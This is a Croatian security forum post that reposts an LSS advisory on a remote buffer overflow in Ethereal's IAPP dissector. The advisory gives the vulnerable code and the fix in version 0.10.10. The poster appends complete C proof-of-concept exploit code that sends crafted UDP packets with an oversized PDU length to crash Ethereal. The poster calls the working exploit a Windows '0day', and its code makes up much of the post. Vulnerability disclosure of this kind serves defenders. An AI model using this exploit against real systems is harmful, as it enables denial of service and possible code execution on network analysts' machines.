[ DownBload @ 12.03.2005. 15:30 ] @
Jos jedan ethereal 0day koji je tek poslan na bugtraq.... :) ES dobiva advisorye prije bugtraqa ;) ------------------------------------------------------------------------ LSS Security Advisory #LSS-2005-03-05 http://security.lss.hr --- Title : Ethereal remote buffer overflow #2 Advisory ID : LSS-2005-03-05 Date : 10.03.2005 Advisory URL: : http://security.lss.hr/index.p...=details&ID=LSS-2005-03-05 Impact : DoS and possible code execution (not confirmed) Risk level : Medium Vulnerability type : Remote Vendors contacted : 10th March, 2005 --- ===[ Overview Ethereal is an application used by network professionals for troubleshooting, analysis and education, as well as the software and protocol development. Ethereal provides all the features that protocol analyzer should have. Moreover, there are several extra features which other products do not support. The license is open source, what allows networking community experts to add enhancements. Ethereal also supports different platforms, including Unix, Linux, and Windows. ===[ Vulnerability We have discovered another vulnerability in one of Ethereal dissectors. This time problem is in IAPP dissector. It is possible to overflow static buffer with length value taken from network packet. Vulnerability itself is in dissect_pdus() function. Length is calculated from two guint8 variables in which first is shifted to left, and second is added to it, so it can be up to 65535. That length is later used in loops that can be abused to overflow static buffer 'textbuffer[2000]'. packet-iapp.c ------------- static void dissect_pdus(tvbuff_t *tvb, int offset, proto_tree *pdutree, int pdulen) { ... int len; ... tvb_memcpy(tvb, (guint8 *)&pduhdr, offset, sizeof(e_pduhdr)); len = (((int)pduhdr.pdu_len_h) << 8) + pduhdr.pdu_len_l; ... } ------------- Vulnerable loop example in packet-iapp.c: ----------------- pduval_to_str(int type, int len, tvbuff_t *tvb, int offset) { ... case IAPP_PDU_MSADDR: mac = tvb_get_ptr(tvb, offset + 3, len); for (z = 0; z < len; z++) run += sprintf(run, "%s%02x", z ? ":" : "", mac[z]); break; ... } ---------------- Remote code execution depends on overflowed buffer environment, and maybe it could be possible, but wasn't further investigated. ===[ Affected versions All versions after IAPP dissector was added to CVS, including version 0.10.9. PoC exploit for this vulnerability was tested with Ethereal 0.10.9 on Windows, and Ethereal developer Guy Harris tested it on OS X. ===[ Fix This vulnerability is fixed in latest Ethereal version 0.10.10, and can be downloaded from http://www.ethereal.com/download.html. ===[ PoC Exploit Proof of concept code can be downloaded at http://security.lss.hr/en/PoC ===[ Credits Credits for this vulnerability goes to Leon Juranic <[email protected]>. ===[ LSS Security Contact LSS Security Team, <eXposed by LSS> WWW : http://security.lss.hr E-mail : [email protected] Tel : +385 1 6129 775 PoC exploit: (Testiran na windozama, pa ga mozemo nazvati windows-0day....... sunnis;-) /* * * Ethereal IAPP remote buffer overflow #2 PoC exploit * --------------------------------------------------- * To test this vulnerability on windows, try to send 3-10 packets * that will trigger the crash, and scroll between captured packets * in Ethereal. * * Coded by Leon Juranic <[email protected]> * LSS Security <http://security.lss.hr/en/> * */ #include <stdio.h> #include <windows.h> #pragma comment (lib,"ws2_32") #define IAPP_PDU_SSID 0 typedef struct _e_iapphdr { unsigned char ia_version; unsigned char ia_type; } e_iapphdr; typedef struct _e_pduhdr { unsigned char pdu_type; unsigned char pdu_len_h; unsigned char pdu_len_l; } e_pduhdr; void xp_sendpacket (char *pack) { WORD wVersionRequested; WSADATA wsaData; int err; int sock,i; struct sockaddr_in sin; unsigned char buf[10240]; char bla[20000]; e_iapphdr *iapp; e_pduhdr *pdu; wVersionRequested = MAKEWORD( 2, 2 ); err = WSAStartup( wVersionRequested, &wsaData ); if ( err != 0 ) { printf ("ERROR: Sorry, cannot create socket!!!\n"); ExitProcess(-1); } sock=socket(AF_INET,SOCK_DGRAM,0); sin.sin_family=AF_INET; sin.sin_addr.s_addr = inet_addr(pack); sin.sin_port = htons(2313); iapp = (e_iapphdr*)&buf; iapp->ia_version = 1; iapp->ia_type = 1; pdu = (e_pduhdr*)(buf+2); pdu->pdu_type = 3; pdu->pdu_len_h = 0x05; pdu->pdu_len_l = 0xa1; memset (bla,'\xfc',1300); strncpy ((char*)&buf+sizeof(e_iapphdr)+sizeof(e_pduhdr),bla,2000); // for (i=0;i<1000;i++) sendto (sock,(char*)buf,1489,0,(struct sockaddr*)&sin,sizeof(struct sockaddr)); } main (int argc, char **argv) { xp_sendpacket(argv[1]); } |